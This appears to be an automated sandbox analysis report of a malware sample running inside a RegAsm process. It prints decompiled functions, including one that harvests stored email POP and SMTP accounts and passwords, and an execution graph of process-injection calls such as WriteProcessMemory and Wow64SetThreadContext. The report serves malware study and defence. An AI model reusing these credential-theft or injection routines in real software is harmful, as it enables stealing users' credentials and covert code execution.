                                                                                          • GetFileAttributesW.KERNEL32(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                                                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004049FF(void* _a4) {
                                                                                          				long _t3;
                                                                                          				void* _t4;
                                                                                          
                                                                                          				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                                                                                          				_t3 = RegCloseKey(_a4); // executed
                                                                                          				return _t3;
                                                                                          			}





                                                                                          0x00404a0d
                                                                                          0x00404a15
                                                                                          0x00404a18

                                                                                          APIs
                                                                                          • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403B64(WCHAR* _a4) {
                                                                                          				int _t3;
                                                                                          				void* _t4;
                                                                                          
                                                                                          				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                                                                                          				_t3 = PathFileExistsW(_a4); // executed
                                                                                          				return _t3;
                                                                                          			}





                                                                                          0x00403b72
                                                                                          0x00403b7a
                                                                                          0x00403b7d

                                                                                          APIs
                                                                                          • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID:
                                                                                          • API String ID: 1174141254-0
                                                                                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: closesocket
                                                                                          • String ID:
                                                                                          • API String ID: 2781271927-0
                                                                                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004044EE(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
                                                                                          				intOrPtr _v8;
                                                                                          				void* _t25;
                                                                                          				void* _t28;
                                                                                          				long _t29;
                                                                                          				signed int _t36;
                                                                                          				void* _t45;
                                                                                          				signed int _t53;
                                                                                          				signed int _t55;
                                                                                          				signed int _t58;
                                                                                          				void* _t61;
                                                                                          				void* _t63;
                                                                                          
                                                                                          				_t36 = 0x400;
                                                                                          				_t53 = 2;
                                                                                          				_t58 = 0x400;
                                                                                          				_t61 = E00402B7C( ~(0 | __eflags > 0x00000000) | 0x00000400 * _t53);
                                                                                          				if(_t61 == 0) {
                                                                                          					L4:
                                                                                          					_t25 = 0;
                                                                                          				} else {
                                                                                          					_v8 = 0x800;
                                                                                          					while(1) {
                                                                                          						E00402B4E(_t61, 0, _t58 + _t58);
                                                                                          						_t28 = E004044A7(_a8, _a12, _a16, _t61, _t58, _a4);
                                                                                          						_t13 = _t58 - 1; // 0x3ff
                                                                                          						_t63 = _t63 + 0x24;
                                                                                          						_t66 = _t28 - _t13;
                                                                                          						if(_t28 != _t13) {
                                                                                          							break;
                                                                                          						}
                                                                                          						_v8 = _v8 + 0x800;
                                                                                          						_t36 = _t36 + 0x400;
                                                                                          						E00402BAB(_t61);
                                                                                          						_t55 = 2;
                                                                                          						_t58 = _t36;
                                                                                          						_t61 = E00402B7C( ~(0 | _t66 > 0x00000000) | _t36 * _t55);
                                                                                          						if(_t61 != 0) {
                                                                                          							continue;
                                                                                          						} else {
                                                                                          							goto L4;
                                                                                          						}
                                                                                          						goto L5;
                                                                                          					}
                                                                                          					_t29 = GetLastError();
                                                                                          					_t45 = 2;
                                                                                          					__eflags = _t29 - _t45;
                                                                                          					if(_t29 != _t45) {
                                                                                          						_t25 = _t61;
                                                                                          					} else {
                                                                                          						E00402BAB(_t61);
                                                                                          						goto L4;
                                                                                          					}
                                                                                          				}
                                                                                          				L5:
                                                                                          				return _t25;
                                                                                          			}














                                                                                          0x004044f5
                                                                                          0x004044fe
                                                                                          0x00404501
                                                                                          0x00404512
                                                                                          0x00404517
                                                                                          0x0040457c
                                                                                          0x0040457c
                                                                                          0x00404519
                                                                                          0x00404519
                                                                                          0x00404520
                                                                                          0x00404527
                                                                                          0x0040453a
                                                                                          0x0040453f
                                                                                          0x00404542
                                                                                          0x00404545
                                                                                          0x00404547
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00404549
                                                                                          0x00404550
                                                                                          0x00404557
                                                                                          0x00404562
                                                                                          0x00404565
                                                                                          0x00404574
                                                                                          0x0040457a
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x0040457a
                                                                                          0x00404585
                                                                                          0x0040458d
                                                                                          0x0040458e
                                                                                          0x00404590
                                                                                          0x0040459b
                                                                                          0x00404592
                                                                                          0x00404593
                                                                                          0x00000000
                                                                                          0x00404598
                                                                                          0x00404590
                                                                                          0x0040457e
                                                                                          0x00404584

                                                                                          APIs
                                                                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                            • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                                                          • GetLastError.KERNEL32 ref: 00404585
                                                                                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                                                                                          • String ID:
                                                                                          • API String ID: 4065557613-0
                                                                                          • Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                                                          • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                                                                                          • Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                                                          • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403F9E(void* _a4) {
                                                                                          				int _t3;
                                                                                          				void* _t4;
                                                                                          
                                                                                          				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                                                                                          				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                                                                                          				return _t3;
                                                                                          			}





                                                                                          0x00403fac
                                                                                          0x00403fba
                                                                                          0x00403fbe

                                                                                          APIs
                                                                                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1263568516-0
                                                                                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403C40(void* _a4) {
                                                                                          				int _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                                                                                          				_t4 = CloseHandle(_a4); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x00403c4d
                                                                                          0x00403c55
                                                                                          0x00403c58

                                                                                          APIs
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00406472(long _a4) {
                                                                                          				void* _t3;
                                                                                          				void* _t4;
                                                                                          
                                                                                          				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                                                                                          				Sleep(_a4); // executed
                                                                                          				return _t3;
                                                                                          			}





                                                                                          0x0040647f
                                                                                          0x00406487
                                                                                          0x0040648a

                                                                                          APIs
                                                                                          • Sleep.KERNEL32(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          APIs
                                                                                          • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                          • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                          • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                          • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                          • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                          • String ID:
                                                                                          • API String ID: 1312198159-0
                                                                                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 88%
                                                                                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                                                                                          				signed int _v8;
                                                                                          				signed int _v12;
                                                                                          				intOrPtr _v16;
                                                                                          				intOrPtr _v20;
                                                                                          				intOrPtr _v24;
                                                                                          				intOrPtr _v28;
                                                                                          				intOrPtr _v32;
                                                                                          				intOrPtr _v36;
                                                                                          				intOrPtr _v40;
                                                                                          				intOrPtr _v44;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				intOrPtr _t40;
                                                                                          				intOrPtr _t45;
                                                                                          				intOrPtr _t47;
                                                                                          				void* _t71;
                                                                                          				void* _t75;
                                                                                          				void* _t77;
                                                                                          
                                                                                          				_t72 = _a4;
                                                                                          				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                                                                                          				_t81 = _t71;
                                                                                          				if(_t71 != 0) {
                                                                                          					_push(__ebx);
                                                                                          					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                                                                                          					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                                                                                          					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                                                                                          					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                                                                                          					_v8 = _v8 & 0x00000000;
                                                                                          					_v20 = _t40;
                                                                                          					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                                                                                          					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                                                                                          					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                                                                                          					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                                                                                          					_v12 = _v12 & 0x00000000;
                                                                                          					_v32 = _t45;
                                                                                          					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                                                                                          					_t77 = _t75 + 0x50;
                                                                                          					_v36 = _t47;
                                                                                          					if(_v8 != 0 || _v12 != 0) {
                                                                                          						E00405872( *0x49f934, _t71, 1, 0);
                                                                                          						E00405872( *0x49f934, _t67, 1, 0);
                                                                                          						_t74 = _v16;
                                                                                          						E00405872( *0x49f934, _v16, 1, 0);
                                                                                          						E00405781( *0x49f934, _v40);
                                                                                          						E00405872( *0x49f934, _v20, 1, 0);
                                                                                          						_push(_v8);
                                                                                          						E00405762(_v16,  *0x49f934, _v24);
                                                                                          						E00405872( *0x49f934, _v28, 1, 0);
                                                                                          						E00405781( *0x49f934, _v44);
                                                                                          						E00405872( *0x49f934, _v32, 1, 0);
                                                                                          						_push(_v12);
                                                                                          						E00405762(_t74,  *0x49f934, _v36);
                                                                                          						_t77 = _t77 + 0x88;
                                                                                          					} else {
                                                                                          						_t74 = _v16;
                                                                                          					}
                                                                                          					E0040471C(_t71);
                                                                                          					E0040471C(_t67);
                                                                                          					E0040471C(_t74);
                                                                                          					E0040471C(_v20);
                                                                                          					E0040471C(_v24);
                                                                                          					E0040471C(_v28);
                                                                                          					E0040471C(_v32);
                                                                                          					E0040471C(_v36);
                                                                                          				}
                                                                                          				return 1;
                                                                                          			}





















                                                                                          0x0040d070
                                                                                          0x0040d080
                                                                                          0x0040d084
                                                                                          0x0040d086
                                                                                          0x0040d08c
                                                                                          0x0040d0a0
                                                                                          0x0040d0ae
                                                                                          0x0040d0bd
                                                                                          0x0040d0c0
                                                                                          0x0040d0c5
                                                                                          0x0040d0c9
                                                                                          0x0040d0e3
                                                                                          0x0040d0f2
                                                                                          0x0040d101
                                                                                          0x0040d104
                                                                                          0x0040d109
                                                                                          0x0040d110
                                                                                          0x0040d11e
                                                                                          0x0040d123
                                                                                          0x0040d126
                                                                                          0x0040d12d
                                                                                          0x0040d145
                                                                                          0x0040d154
                                                                                          0x0040d15a
                                                                                          0x0040d166
                                                                                          0x0040d174
                                                                                          0x0040d186
                                                                                          0x0040d18e
                                                                                          0x0040d19a
                                                                                          0x0040d1ac
                                                                                          0x0040d1ba
                                                                                          0x0040d1cc
                                                                                          0x0040d1d1
                                                                                          0x0040d1dd
                                                                                          0x0040d1e2
                                                                                          0x0040d1e7
                                                                                          0x0040d1e7
                                                                                          0x0040d1e7
                                                                                          0x0040d1eb
                                                                                          0x0040d1f1
                                                                                          0x0040d1f7
                                                                                          0x0040d1ff
                                                                                          0x0040d207
                                                                                          0x0040d20f
                                                                                          0x0040d217
                                                                                          0x0040d21f
                                                                                          0x0040d227
                                                                                          0x0040d230

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                          • API String ID: 0-2111798378
                                                                                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 90%
                                                                                          			E0040317B(intOrPtr _a4) {
                                                                                          				signed int _v8;
                                                                                          				intOrPtr _v12;
                                                                                          				void* __ecx;
                                                                                          				intOrPtr _t17;
                                                                                          				void* _t21;
                                                                                          				intOrPtr* _t23;
                                                                                          				void* _t26;
                                                                                          				void* _t28;
                                                                                          				intOrPtr* _t31;
                                                                                          				void* _t33;
                                                                                          				signed int _t34;
                                                                                          
                                                                                          				_push(_t25);
                                                                                          				_t1 =  &_v8;
                                                                                          				 *_t1 = _v8 & 0x00000000;
                                                                                          				_t34 =  *_t1;
                                                                                          				_v8 =  *[fs:0x30];
                                                                                          				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                                                                                          				_t31 = _t23;
                                                                                          				do {
                                                                                          					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                                                                                          					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                                                                                          					_pop(_t26);
                                                                                          					_t35 = _t28;
                                                                                          					if(_t28 == 0) {
                                                                                          						goto L3;
                                                                                          					} else {
                                                                                          						E004032EA(_t35, _t28, 0);
                                                                                          						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                                                                                          						_t33 = _t33 + 0x14;
                                                                                          						if(_a4 == _t21) {
                                                                                          							_t17 = _v12;
                                                                                          						} else {
                                                                                          							goto L3;
                                                                                          						}
                                                                                          					}
                                                                                          					L5:
                                                                                          					return _t17;
                                                                                          					L3:
                                                                                          					_t31 =  *_t31;
                                                                                          				} while (_t23 != _t31);
                                                                                          				_t17 = 0;
                                                                                          				goto L5;
                                                                                          			}














                                                                                          0x0040317f
                                                                                          0x00403180
                                                                                          0x00403180
                                                                                          0x00403180
                                                                                          0x0040318d
                                                                                          0x00403196
                                                                                          0x00403199
                                                                                          0x0040319b
                                                                                          0x004031a1
                                                                                          0x004031a9
                                                                                          0x004031ab
                                                                                          0x004031ac
                                                                                          0x004031ae
                                                                                          0x00000000
                                                                                          0x004031b0
                                                                                          0x004031b3
                                                                                          0x004031c2
                                                                                          0x004031c7
                                                                                          0x004031cd
                                                                                          0x004031e0
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x004031cd
                                                                                          0x004031d7
                                                                                          0x004031dd
                                                                                          0x004031cf
                                                                                          0x004031cf
                                                                                          0x004031d1
                                                                                          0x004031d5
                                                                                          0x00000000

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:32.9%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:202
                                                                                          Total number of Limit Nodes:18

                                                                                          Graph

                                                                                          execution_graph 10956 40fa30 10957 40fa3c 10956->10957 10964 d40006 10957->10964 10969 d40048 10957->10969 10958 40fa47 10974 d43f48 10958->10974 10995 d43f39 10958->10995 10959 40fa59 10965 d4006a 10964->10965 11016 403ac1 10965->11016 11020 403ac8 10965->11020 10966 d40946 10966->10958 10970 d4006a 10969->10970 10972 403ac1 VirtualProtect 10970->10972 10973 403ac8 VirtualProtect 10970->10973 10971 d40946 10971->10958 10972->10971 10973->10971 10976 d43f77 10974->10976 10975 d4416f 10975->10959 10976->10975 10982 d445e1 10976->10982 11023 4077c0 10976->11023 11026 4077b8 10976->11026 10977 d44994 10993 4077c0 VirtualProtect 10977->10993 10994 4077b8 VirtualProtect 10977->10994 10978 d44be7 10980 d44ced 10978->10980 10987 4077c0 VirtualProtect 10978->10987 10988 4077b8 VirtualProtect 10978->10988 10979 d44916 10983 4077c0 VirtualProtect 10979->10983 10984 4077b8 VirtualProtect 10979->10984 10980->10959 10981 d44ad0 10991 4077c0 VirtualProtect 10981->10991 10992 4077b8 VirtualProtect 10981->10992 10982->10977 10985 4077c0 VirtualProtect 10982->10985 10986 4077b8 VirtualProtect 10982->10986 10983->10977 10984->10977 10985->10979 10986->10979 10987->10978 10988->10978 10991->10978 10992->10978 10993->10981 10994->10981 10996 d43f77 10995->10996 10997 d4416f 10996->10997 11002 d445e1 10996->11002 11014 4077c0 VirtualProtect 10996->11014 11015 4077b8 VirtualProtect 10996->11015 10997->10959 10998 d44994 11006 4077c0 VirtualProtect 10998->11006 11007 4077b8 VirtualProtect 10998->11007 10999 d44916 11010 4077c0 VirtualProtect 10999->11010 11011 4077b8 VirtualProtect 10999->11011 11000 d44ced 11000->10959 11001 d44ad0 11004 4077c0 VirtualProtect 11001->11004 11005 4077b8 VirtualProtect 11001->11005 11002->10998 11012 4077c0 VirtualProtect 11002->11012 11013 4077b8 VirtualProtect 11002->11013 11003 d44be7 11003->11000 11008 4077c0 VirtualProtect 11003->11008 11009 4077b8 VirtualProtect 11003->11009 11004->11003 11005->11003 11006->11001 11007->11001 11008->11003 11009->11003 11010->10998 11011->10998 11012->10999 11013->10999 11014->10996 11015->10996 11017 403ac8 VirtualProtect 11016->11017 11019 403b81 11017->11019 11019->10966 11021 403b15 VirtualProtect 11020->11021 11022 403b81 11021->11022 11022->10966 11024 40780d VirtualProtect 11023->11024 11025 407879 11024->11025 11025->10976 11027 40780d VirtualProtect 11026->11027 11028 407879 11027->11028 11028->10976 10948 d4a110 10949 d4a159 Wow64SetThreadContext 10948->10949 10951 d4a1d1 10949->10951 11029 d49cc0 11030 d49d0c WriteProcessMemory 11029->11030 11032 d49da5 11030->11032 11033 d45ba0 11034 d45bba 11033->11034 11035 d45bfc 11034->11035 11037 d45da0 11034->11037 11038 d45d74 11037->11038 11039 d45da7 11037->11039 11038->11034 11039->11038 11043 d46df0 11039->11043 11047 d46e00 11039->11047 11040 d46003 11040->11034 11044 d46e01 11043->11044 11051 d46ef0 11044->11051 11048 d46e27 11047->11048 11050 d46ef0 CreateProcessAsUserW 11048->11050 11049 d46e75 11049->11040 11050->11049 11052 d46f71 CreateProcessAsUserW 11051->11052 11054 d470f1 11052->11054 11055 400e18 11057 400e35 11055->11057 11056 400fb7 11057->11056 11065 401420 11057->11065 11075 401679 11057->11075 11079 401430 11057->11079 11089 401582 11057->11089 11099 401569 11057->11099 11109 401df1 11057->11109 11113 401e00 11057->11113 11066 401425 11065->11066 11067 4015bc 11066->11067 11070 401420 2 API calls 11066->11070 11071 401430 2 API calls 11066->11071 11072 401582 2 API calls 11066->11072 11073 401569 2 API calls 11066->11073 11074 401679 2 API calls 11066->11074 11068 401626 11067->11068 11117 401ca8 11067->11117 11068->11057 11070->11066 11071->11066 11072->11066 11073->11066 11074->11066 11076 401699 11075->11076 11077 401736 11076->11077 11078 401ca8 2 API calls 11076->11078 11077->11057 11078->11076 11080 40144e 11079->11080 11081 4015bc 11080->11081 11084 401420 2 API calls 11080->11084 11085 401430 2 API calls 11080->11085 11086 401582 2 API calls 11080->11086 11087 401569 2 API calls 11080->11087 11088 401679 2 API calls 11080->11088 11082 401626 11081->11082 11083 401ca8 2 API calls 11081->11083 11082->11057 11083->11081 11084->11080 11085->11080 